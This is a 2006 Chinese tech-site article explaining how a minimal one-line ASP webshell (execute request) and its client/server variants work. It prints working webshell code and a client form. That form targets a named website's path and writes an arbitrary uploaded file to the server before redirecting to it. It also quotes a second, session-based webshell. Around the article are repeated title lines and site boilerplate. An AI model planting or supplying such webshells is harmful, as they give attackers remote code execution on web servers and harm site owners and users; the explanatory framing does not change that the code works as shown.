从蓝屏最小的asp木马来看C/S木马的编写--计算机文谷--ASP

ASP频道

没有任何子栏目

您现在的位置： IT文谷 >> 网站工程 >> 网页编程 >> ASP >> 文章正文

从蓝屏最小的asp木马来看C/S木马的编写

从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写

从蓝屏最小的asp木马来看C/S木马的编写

从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写

文谷 www.wengu.com
来源：网络作者：佚名
时间：2006-4-10 浏览人数：

从蓝屏最小的asp木马来看C/S木马的编写

从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写

这几天狂补asp，昨天休息，无聊就把自己的东西总结了一下，突然想到了我们经常使用的C/S型的webshell，
于是乎就胡乱分析了一下！呵呵！
众所周知，蓝屏的最小的asp木马，服务端仅一句话：
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <%execute request("Neeao")%>

可以说是C/S型木马的极品！再看客户端：
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <form action=http://www.fjmeec.com/manage/Databackup/DataShop.asp method=post>
<textarea name=Neeao cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("p")
lP.SaveToFile server.mappath("Neeao.asp"),2
lP.Close
set lP=nothing
response.redirect "Neeao.asp"
</textarea>
<textarea name=p cols=120 rows=10 width=45>这填马的代码</textarea><BR><center><br>
<input type=submit value=提交>

也不是很大！
下面我们来分析一下他们的代码，先从客户端的开始吧
其实很简单，就是将两个文本框的内容提交到服务端！
看服务端：
execute语句，执行一句或多句asp语句
request对象，获得提交来的数据。
这样这个C/S型木马的执行如下：
先将客户端的两个文本框的数据提交给服务端，
服务端先获得第一个表单的内容，并执行获得的语句，
再由 _code cellSpacing=1 cellPadding=0 width="90%" border=0> lP.writetext request("p")
获得第二个文本框的内容，
然后由 _code cellSpacing=1 cellPadding=0 width="90%" border=0> lP.SaveToFile server.mappath("dbbak.asp"),2

语句将文本框的内容写入当前目录下为Neeao.asp.
写入成功后再用 _code cellSpacing=1 cellPadding=0 width="90%" border=0> response.redirect "Neeao.asp"

语句跳转到Neeao.asp执行。结构可谓简单的很。

从这个分析过程中,想到了一种给这个木马加个密码的方法：
我们从表单的提交过程中可以知道，客户端到服务端通过Neeao这个值来传递数据的，
那我们来修改这个值的名字是否可以达到加密的效果呢！
看了kker的C/S木马，服务端如下：
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <!了><object id=fs RUNAT=SERVER classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object><!了>
<%if request("kker")<>"" then Session("b")=request("kker")
if Session("b")<>"" then execute Session("b")%>

其中客户端提交的一段代码为：
_code cellSpacing=1 cellPadding=0 width="90%" border=0> ......
<form name="Kker" method="POST" action="<%=url%>" onsubmit="return(ccc());">
<p align="center">
<textarea style="display:none" name=<%=pczz%> rows="20" cols="100">
on error resume next
Session.TimeOut=1440
......
可见其就是用的这种方法！

总的来说，C/S型的webshell使用的方法就是通过客户端提交信息，利用asp的request方法来获取客户端的数据然后执行，
呵呵，怎么觉的象是废话呢！
声明：本文没什么技术含量，仅算是自己学习的一个总结吧！

从蓝屏最小的asp木马来看C/S木马的编写

从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写

上一篇文章： ASP与数据库应用（给初学者）

下一篇文章： ASP 函数语法速查表

进入论坛讨论

Request.ServerVariables的值与防盗链
ASP正则表达式详解
ASP.NET的ACCESS数据库操作类
ASP.NET中的窗体身份验证
ASP.NET中的Windows身份验证
将Asp.net页面输出为HTML
log4net配置成可log到ms sql
解决ASP.NET网页出现的乱码问题
技术应用－asp.net加密方法
ASP.NET 中字符的格式化输出
.NET中获取电脑名、IP及用户名方法
ASP.NET数据库编程之处理文件访问许可

热门文章	最新推荐

版权与免责声明：
① 本网转载其他媒体稿件是为传播更多的信息，此类稿件不代表本网观点，版权归原作者所有，本网不承担此类稿件侵权行为的连带责任。
② 本站原创文章，转载时请注明出自文谷及作者姓名
③在本网BBS上发表言论者，文责自负。
④如您因版权等问题需要与本网联络，请在30日内联系。

从蓝屏最小的asp木马来看C/S木马的编写

从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写

从蓝屏最小的asp木马来看C/S木马的编写

从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写2006-4-10 22:53:32从蓝屏最小的asp木马来看C/S木马的编写

全站热点